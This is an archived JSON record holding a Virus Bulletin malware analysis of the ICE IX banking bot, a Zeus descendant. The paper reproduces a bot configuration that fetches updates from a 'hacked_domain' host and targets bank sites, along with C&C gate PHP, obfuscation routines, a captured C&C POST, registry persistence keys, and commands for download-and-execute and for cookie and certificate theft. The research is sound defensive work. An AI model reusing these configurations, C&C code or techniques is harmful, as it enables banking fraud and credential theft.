{
	"id": "cd555143-a910-4b18-9350-3c3ea9f4397d",
	"created_at": "2026-04-06T00:13:03.988893Z",
	"updated_at": "2026-04-10T03:21:28.006538Z",
	"deleted_at": null,
	"sha1_hash": "22cf1586ec8ba727a3650e5e00103711bfa48afb",
	"title": "Inside the ICE IX bot, descendent of Zeus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 560779,
	"plain_text": "Inside the ICE IX bot, descendent of Zeus\r\nBy Aditya K. SoodMichigan State University, USA\r\nArchived: 2026-04-05 14:01:18 UTC\r\n2012-08-01\r\nRichard J. Enbody\r\nMichigan Stat University, USA\r\nRohit Bansal\r\nSecNiche Security Labs, USA\r\nEditor: Helen Martin\r\nAbstract\r\nAditya Sood and colleagues present an analysis of ICE IX bot, a descendent of the Zeus bot which demonstrates\r\nhow one bot can give rise to another.\r\nCopyright © 2012 Virus Bulletin\r\nThe ICE IX bot is considered to be a descendent of the Zeus botnet because it uses some of Zeus’s source code.\r\nICE IX communicates using the HTTP protocol, so it can be considered to be a third generation botnet. While it\r\nhas been used for a variety of purposes, a major threat of ICE IX comes from its manipulation of banking\r\noperations on infected machines. As with any bot, infection results in establishing a master-slave relationship\r\nbetween the botmaster and the compromised machine.\r\nSome researchers do not consider ICE IX to be as effective as Zeus [1] – for example because of its code reuse,\r\nhaving fewer features, and so on. ICE IX implements the web injects feature that was the core feature of the Zeus\r\nbotnet. It also uses some of the interesting code patterns from Zeus’s source. For example, the web injects module\r\nhas been optimized to work effectively with different browsers. ICE IX implements enhanced driver-mode code to\r\nbypass firewalls and protection software without raising any alarms. 
However, ICE IX is still an interesting target\r\nfor analysis and in this paper we present an analysis of the ICE IX bot version \u003c= 1.2.0 to cover its different\r\nfunctionalities.\r\nThe roots of the name ICE IX may lie in literature: William Gibson’s 1984 novel Neuromancer coined the term\r\n‘ICE’, which stood for ‘Intrusion Countermeasure Electronics’, and the central theme of Kurt Vonnegut’s 1963\r\nnovel Cat’s Cradle was the ice-nine crystal – which spread to crystallize the water of the world. In the rest of the\r\npaper, we will shorten ICE IX to ICE.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 1 of 16\n\nICE bot building and configuration\r\nTo configure the ICE bot, several parameters are defined in the file settings.txt. This file contains several sections,\r\neach defining various functions of the ICE bot. It is useful to begin with the configuration settings because these\r\nexpose the bot’s capabilities. The different configuration parameters of the ICE bot are as follows:\r\nautoupdate_path: this parameter defines the path of the executable file (hosted in a remote location) that the\r\nICE bot downloads to update itself when configuration parameters change.\r\nreceiving_script_path: this parameter defines a path to the gateway that the ICE bot uses to connect back to\r\nits Command and Control (C\u0026C) server. 
ICE uses this connection to pass on information extracted from\r\nthe compromised machines.\r\ninjects_file: this parameter defines a path to the web injects file which contains rule sets for altering\r\nincoming HTTP responses to inject illegitimate content into web pages.\r\nDataGrabFilters: this parameter defines filters for grabbing content in web pages.\r\nURLRedirects: this parameter defines redirection rules for particular domains, allowing the browser to\r\nserve a fake web page when a legitimate domain name is entered in the address bar.\r\nMirrorServers: this parameter defines a path for backup servers that store the different configuration files\r\nfor the ICE bot. If a primary server becomes unavailable, this option acts as a secure failover so the bot can\r\ndownload other versions of configuration files from mirror (backup) servers.\r\nURIMasks: this parameter specifies various masks (a.k.a. rules) for customizing operations on different\r\nwebsites. The ‘N’ flag specifies that the ICE bot should not write any data in its reports. The ‘S’ flag\r\ninstructs the bot to take a screenshot of the web page specified in the URI. The ‘C’ flag instructs the bot to\r\nmanage the cookie handling support for the masked URI so it can preserve and delete the cookies\r\nassociated with the domain. 
The ‘B’ flag blocks access to the website specified in the masked URI.\r\nA simple example of an ICE bot configuration file is presented in Listing 1 below:\r\n{“Settings”\r\n autoupdate_path “http://hacked_domain/bot.exe”\r\n receiving_script_path “http://hacked_domain/script.php”\r\n injects_file “web_injects.txt”\r\n {\"DataGrabFilters\"\r\n ; “Http://mail.rambler.ru/*” “passw; login”\r\n }\r\n {“URLRedirects”\r\n “Http://www.rambler.ru” “http://www.yandex.ru” “GP” “” “”\r\n }\r\n {“MirrorServers”\r\n “http://backup_domain/config_backup_v_1.bin”\r\n }\r\n URI mask\r\n {“URLMasks”\r\n “Nhttp://*wellsfargo.com/*”\r\n “Nhttp://citibank.com/*”\r\n “S*/chase.com/*”\r\n “S*/bankofamerica.com/*”\r\n }\r\n}\r\nListing 1: Example layout of an ICE bot configuration file.\r\nOnce the configuration parameters have been defined in the settings file, it’s time for the builder to generate a bot\r\nthat uses the following specific build parameters:\r\nConfiguration File – path to the configuration file containing settings parameters.\r\nConfiguration File Retrieval Time – specifies the time interval to be set for successful retrieval of the\r\nconfiguration file from the server.\r\nStatistics Retrieval Time – specifies the time interval for sending information back to the C\u0026C server.\r\nEncryption Key – the RC4 encryption key used for encrypting the configuration file.\r\nCertification Deletion – deletes certificates from the infected machine after installation of the bot.\r\nDisable TCP Operations – stops various TCP servers including SOCKS, VNC, etc. that are used as\r\nbackconnect servers.\r\nOther configuration parameters exist, but the primary ones are those discussed above. 
(More detail is provided in\r\nthe appendix.)\r\nUnderstanding the gate communication\r\nThe gate acts as an interface between the C\u0026C server and the infected machine. The bot connects to the gate,\r\nwhich in turn connects to the C\u0026C server. Thus, the bot does not send information directly to the C\u0026C server, but\r\ninstead routes it through the intermediate gate. This gate organization provides a more modular architecture and it\r\nis possible to host the C\u0026C server on a different domain from the gate. However, the gate and C\u0026C server are\r\nusually hosted on the same domain. From a design perspective, gate.php depends on the config.php and\r\nglobal.php files.\r\nListing 2 shows how the C\u0026C server sends the configuration file (settings.bin) in response to a request from the\r\nbot sent through the gate. The bot sends a unique identifier and a computed hash from the infected machine in the\r\nHTTP POST parameters. Once the gate receives the information, it executes the custom code in the config.php\r\nfile. The configuration module then verifies the hash by recomputing it on the server side. This check validates the\r\nsuccessful installation and identity of the bot. The configuration module executes an RC4 encryption routine and\r\nimplements MD5 on the string returned by the RC4 encryption routine. The identifier ($id) is passed as a\r\nparameter to the RC4 encryption with the encryption key (rc4Init ($plainkey)) that was established during the\r\ninstallation of the bot. Once the hash is computed, it is verified against the hash transmitted by the bot. If the\r\nhashes match, the C\u0026C server serves the settings.bin file over HTTP as an attachment. The file encoding is always\r\ndefined as binary and is served as plain text content over HTTP. 
In this way, the configuration file is sent to the bot\r\nin the infected machine.\r\n\u003c?php\r\n$plainkey='[Encryption key to be used]';\r\n$config_file='settings.bin';\r\n$id=$_POST['bn1'];\r\n$hash=$_POST['sk1'];\r\n$originalId=$id;\r\nfunction rc4Init($key){-- Redacted --}\r\nfunction rc4(\u0026$data, $key) {-- Redacted --}\r\nrc4($id,rc4Init($plainkey));\r\n$hashtocompare=strtoupper(md5($id));\r\n$data=\"originalId=$originalId hash=$hash hashtocompare=$hashtocompare\\n\";\r\nif ($hashtocompare==$hash)\r\n {\r\n header('Content-Type: text/plain');\r\n header('Content-Disposition: attachment; filename=' . $config_file);\r\n header('Content-Length: ' . filesize($config_file));\r\n header('Content-Transfer-Encoding: binary');\r\n readfile($config_file);\r\n }\r\nelse\r\n {\r\n header($_SERVER['SERVER_PROTOCOL'].\" 404 Not Found\");\r\n }\r\n?\u003e\r\nListing 2: ICE bot configuration module.\r\nOur disassembly of the ICE bot binary yielded results similar to those shown in Listing 2. Figure 1 shows how the\r\nICE bot uses variables ‘bn1’ and ‘sk1’ to extract information from the infected machine. The ‘bn1’ variable holds\r\nthe unique value of an identifier, while the ‘sk1’ variable holds the hash value.\r\nFigure 1. Parameters extracting ID and hash information.\r\nFigure 2 shows how the ICE bot generates the hash. It implements the CryptHashData and CryptCreateHash\r\nfunctions to handle hash operations. The bot keeps sending HTTP POST requests back to the C\u0026C server to notify\r\nit of any updates in the system and to send extracted information. The HTTP POST request sent back to the gate is\r\npresented in Listing 3.\r\nFigure 2. 
Hash generation process.\r\n--- Redacted Content ----\r\nPOST /private/adm/gate.php HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\r\nHost: 4umf.com\r\nConnection: Keep-Alive\r\n.......Nl.\u0026]s.T.(.9.C..R.cF^Zrf.=A....6[..+.aq..f....;^.a.\\.w..O?...KFa,X..i....j-\r\n.k..\u0026..f.y@.^N.....43.h..R.0r.g......w.m8..._............h...\\@..C.n....3...W....\r\n3..,...0..k..sxp..p...8..|..[ ...AD.\u003c.._.k..”!....\\..B..;.)..~MZ.;U..]B.R..`..S....\r\nz...a..y..`........N.\u003eE...bD.F....o8d...|...dS..l.l.j....r..H...n.O....`....P.....\r\nw.y..%..Ikj...{........K....6.~...._..^E...UP9..|SN.#.C+...]..U...?..g............\r\n.....ZM.Q0.Z.....!W....Q.s...g.............:z.8..q’.q...3......L..M.....0......5’m.\r\n......2\u003e.......].c....i..R.S.v..........w..k.\\..jU....$....SIV9EWl6.L.`N9*....)...\r\n...?r{.M.kt.IZ.f...6H.......\\.4I.....=:l.o..QQ.......yV...\r\nHTTP/1.1 200 OK\r\nDate: Mon, 11 Jun 2012 03:50:51 GMT\r\nServer: Apache/2.2.14\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n{.”..a1]....S.=.W..t.s.........^@...........RW8V..q.X..w.W...’).\r\n \r\nListing 3: POST request in action.\r\nAnother interesting fact is that the bot generates fake HTTP traffic to google.com/webhp. Whenever the bot sends\r\ninformation back to the gate using HTTP POST requests, it also sends HTTP GET requests to google.com. The\r\nresult is fake traffic so that the HTTP requests look legitimate. Figure 3 shows how the ICE bot generates traffic.\r\nFigure 3. 
ICE bot traffic\r\n--- Redacted Content ---\r\nif($replyCount \u003e 0)\r\n{\r\n $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, $replyCount).md5($replyData, true).$replyData;\r\n visualEncrypt($replyData);\r\n rc4($replyData, $config['botnet_cryptkey_bin']);\r\n echo $replyData;\r\n die();\r\n }\r\n}\r\nfunction sendEmptyReply()\r\n{\r\n $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1).\"\\x4A\\xE7\\x13\\x36\\xE4\\x4B\\xF9\\xBF\\x79\\xD2\\x75\\x2E\\x23\\x48\\x18\\xA5\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\";\r\n visualEncrypt($replyData);\r\n rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);\r\n echo $replyData;\r\n die();\r\n}\r\nfunction visualEncrypt(\u0026$data)\r\n{\r\n $len = strlen($data);\r\n for($i = 1; $i \u003c $len; $i++)$data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));\r\n}\r\nfunction visualDecrypt(\u0026$data)\r\n{\r\n $len = strlen($data);\r\n if($len \u003e 0)for($i = $len - 1; $i \u003e 0; $i--)$data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));\r\n}\r\nListing 4: Data obfuscation.\r\nListing 4 shows some of the obfuscation routines implemented in the ICE bot. When the bot sends information to\r\nthe gate, the C\u0026C can either send an empty reply or one containing some data, depending on the requirements.\r\nWhen the C\u0026C has to send an empty reply, it simply executes sendEmptyReply. To send a reply containing\r\ncommands and data, the C\u0026C server queries its database and then replies. The C\u0026C server implements its\r\nvisualEncrypt function to obfuscate the data, followed by an RC4 encryption routine that uses a predefined crypto\r\nkey to encrypt the full stream and then sends it back to the bot. 
On receiving the stream of data, the bot\r\nimplements the decryption routine to extract the command sent by the C\u0026C server. Listing 5 shows an example of\r\nthe data transmitted over the wire during communication between the bot and the C\u0026C server.\r\n\\240\\321\\373c\\333\\266\\262\\3433l\\201\\332\\314\\022\\223D\\022X\\237\\3277\\320\\272$\\241\\0250(!\\t\\035\\375\\343L\r\n021F.Qa\\031\\001’’@\\361\\364\\233\\365J\\245\\322t\\3730U\\324}\\364@\\262|\\204\\212D\r\n\\360P\\264v\\231\\303QD\\324\\206\\210\\300wV\\n\r\n\\211\\275\\311\\301\\3308\\337\\265+\\256\\032?’.\\006\\022\\362\\354C\\036I!^n\\026\\016((O\\376\\373\\224\\372E\\252\\33\r\n{\\364?Z\\333r\\373O\\275s\\213\\205K\r\n\r\nListing 5: Obfuscated data – ICE bot communication.\r\nWe have now covered the communication model of ICE bot.\r\nICE bot web injects\r\nICE bot’s web injects are similar to those used by Zeus and SpyEye, except that they have been redesigned and\r\noptimized for better performance. They provide improved functionality to inject data with more successful results.\r\nWeb injection is a technique in which a bot injects malicious content into the incoming HTTP responses. The\r\ninjected content tricks the user into entering sensitive information. Details of web injects can be found in [2], [3].\r\nListing 6 shows the content from a webinjects.txt file used by an ICE bot to trigger injections.\r\nset_url https://online.wellsfargo.com/das/cgi-bin/session.cgi* GL\r\ndata_before\r\n\r\ndata_end\r\ndata_inject\r\ndata_end\r\ndata_after\r\n\r\nFigure 4. ICE bot form grabbing in action.\r\nBecause of where it sits, form grabbing works over both HTTP and HTTPS protocols. In addition to stealing data\r\nfrom forms, a similar tactic can be used to grab .sol files (Flash settings) and cookies. The ICE bot also has special\r\nbuilt-in grabbers for particular purposes. 
For example, it has grabbers to extract the credentials from FTP clients\r\nsuch as FlashFXP, Total Commander, WsFTP, FileZilla, FAR Manager, WinSCP, FTP Commander, CoreFTP,\r\nSmartFTP, and from mail clients such as Windows Mail, Live Mail and Outlook.\r\nSelf-destructive code\r\nICE bot implements melting, in which it deletes the dropper program after successful installation. The dropper is\r\nthe malicious binary that was served during a drive-by download attack. Once it has installed the bot, the dropper\r\nis no longer needed so it deletes itself. The dropper can also be thought of as a loader because it loads the ICE bot\r\ninto the system and then removes its initial footprint.\r\nFigure 5 shows a code snippet extracted during analysis of ICE bot. In this snippet, the program has built-in batch\r\ninstructions that are executed after dropping the bot. One can see that the ‘del’ command is used with option ‘/F’\r\nthat forcefully deletes the files in the directory.\r\nFigure 5. Self-destructive code.\r\nUser-Agent detection\r\nFigure 6 shows that the ICE bot uses its ObtainUserAgentString function to retrieve the default User-Agent string\r\nused by the browser in the infected system. Using this information, the details of the infected machine are sent\r\nback to the C\u0026C server, including the type of operating system, browser and other environment-specific\r\ninformation. This communication allows the botmaster to understand the state of infected machines and to fine-tune the infection.\r\nFigure 6. Extracting User-Agent information.\r\nCertificate deletion process\r\nICE bot uses a built-in Windows API function to delete certificates from the certificate store. 
The motive behind\r\ndeleting the certificates is to remove the encryption implemented on the end points. Primarily, the bot is interested\r\nin deleting certificates that are associated with private keys belonging to the user.\r\nThis allows the bot to remove the identity and authentication information present in certificates. After this, when a\r\nuser imports a new certificate, these are captured and stored on the C\u0026C server for later use. The process is\r\nexecuted as follows:\r\nICE bot opens the certificate store using the CertOpenSystemStore API. It typically has two parameters.\r\nThe important one is szSubsystemProtocol, which defines the name of the store. There are four different\r\nattributes associated with the szSubsystemProtocol: CA refers to the certification authority, ROOT refers to\r\nthe root certificates, SPC refers to the Software Publishing Certificate and MY points to the certificate store\r\nthat has certificates associated with private keys. ICE bot uses MY szSubsystemProtocol to query the\r\ncertificate store.\r\nUpon successful opening of the store, ICE bot enumerates the list of certificates using\r\nCertEnumCertificatesInStore in a loop. Using CertDuplicateCertificateContext, it duplicates the certificate\r\ncontext which contains a handle to the certificate store. This is done to retrieve a handle for each unique\r\ncertificate individually, by incrementing and decrementing the reference count.\r\nFinally, the ICE bot deletes the certificate from the store using CertDeleteCertificateFromStore, and then\r\ncloses the store using CertCloseStore.\r\nIt also implements the PFXExportCertStoreEx function, which exports certificates and associated public keys\r\nfrom the certificate store. Figure 7 shows the certificate deletion process in action.\r\nFigure 7. 
Deleting certificates from an infected system.\r\nRegistry check and command execution\r\nWhen an ICE bot is installed, it modifies the registry settings by creating new registry keys. Listing 7 shows the\r\nbehaviour of ICE bot pertaining to registry modifications and disk operations.\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|Microsoft Firevall Engine (Trojan.Agent) -\u003e Data: c:\\windows\\iqs.exe\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|Microsoft Firevall Engine (Trojan.Agent) -\u003e Data: c:\\windows\\iqs.exe\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|{BC7B83DC-3CBF-5AA3-5606-123385554906} (Trojan.ZbotR.Gen) -\u003e Data: “C:\\Documents and Settings\\Administrator\\Application Data\\Fox\\bolifa.exe”\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\Install\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|Microsoft Firevall Engine (Trojan.Agent) -\u003e Data: c:\\windows\\iqs.exe\r\n \r\nListing 7: Registry keys created by ICE bot.\r\nA registry key with the name ‘Microsoft Firevall Engine’ is created, which has an entry in the system startup. It\r\nuses a similar naming convention to the Microsoft firewall in order to be less suspicious. However, the bot can\r\ngenerate random binary names and registry keys to increase the complexity. To trigger command execution, the\r\nbot executes the inbuilt Windows API to subvert the functionality of the operating system. For example: in\r\nrebooting and shutting down the system, the bot uses ExitWindowsEx and InitiateSystemShutdownExW. Figure 8\r\nshows the command execution behaviour.\r\nFigure 8. 
System shutdown module.\r\nBackconnect and supporting modules\r\nBackconnect is an interesting technique that is based on the concept of reverse proxying, in which the reverse\r\nproxy agent takes requests from the servers and forwards them to the machines present in the internal network.\r\nWhen the infected system is situated behind a Network Address Translation (NAT) bridge, malware authors\r\nimplement the backconnect module. The backconnect server hides the identity of the C\u0026C servers on the Internet.\r\nIt is a stealthy way of sending commands to infected machines inside the network used by C\u0026C servers. The\r\nSecure Sockets (SOCKS) protocol is designed specifically to bypass Internet filtering systems and perimeter-level\r\nsecurity. SOCKS proxies are considered as a circumvention tool to bypass firewalls and make successful\r\nconnections using raw TCP sockets. HTTP and SOCKS are used to route communication packets through\r\nfirewalls. ICE bot implements SOCKS proxy with backconnect support. In addition, it also supports the VNC\r\nremote management module. It also implements a screen-capturing module, in which the botmaster defines the\r\nrules for capturing screenshots of target websites.\r\nConclusion\r\nIn this paper, we have presented an analysis of the ICE IX bot, a descendent of the Zeus bot. It uses techniques\r\nsimilar to those of Zeus with some modifications and optimizations. 
The origin of ICE bot demonstrates how one\r\nbot can give rise to another, and how botnets – which are still a threat – are evolving to be more robust and\r\neffective.\r\nBibliography\r\nAppendix: ICE IX bot commands\r\nCommands Explanation\r\nbot_uninstall Uninstalling bot from the infected machine\r\nbot_update Scanning bot for checking the applied configuration and required updates\r\nbot_update_exe Updating bot remotely with new configuration\r\nbot_bc_add Creating backconnect connection with the bot\r\nbot_bc_delete Removing backconnect connection with the bot\r\nbot_httpinject_disable Disabling web injects functionality of the bot\r\nbot_httpinject_enable Enabling web injects functionality of the bot\r\nTable 1. Bot controlling commands\r\nCommands Explanation\r\nuser_destroy Destroy the infected machine\r\nuser_logoff Killing active user session on the infected machine\r\nuser_execute Download and execute remote executable on the infected machine\r\nuser_cookies_get Extract the cookies from stored and active browser session\r\nuser_cookies_remove Delete the cookies\r\nuser_certs_get Extract specific certificate from the infected machine\r\nuser_certs_remove Delete certificates from the infected machine\r\nuser_url_block Block access to a specific domain on the Internet\r\nuser_url_unblock Unblock access to a restricted domain\r\nuser_homepage_set Set the default home page of the browser\r\nuser_flashplayer_get Extract settings of Sol files from the infected machine\r\nuser_flashplayer_remove Delete Sol files from the infected machine\r\nos_shutdown Shut down infected machine\r\nos_reboot Reboot infected machine\r\nTable 2. 
System manipulation commands.\r\nSource: https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus"
	],
	"report_names": [
		"inside-ice-ix-bot-descendent-zeus"
	],
	"threat_actors": [],
	"ts_created_at": 1775434383,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22cf1586ec8ba727a3650e5e00103711bfa48afb.pdf",
		"text": "https://archive.orkl.eu/22cf1586ec8ba727a3650e5e00103711bfa48afb.txt",
		"img": "https://archive.orkl.eu/22cf1586ec8ba727a3650e5e00103711bfa48afb.jpg"
	}
}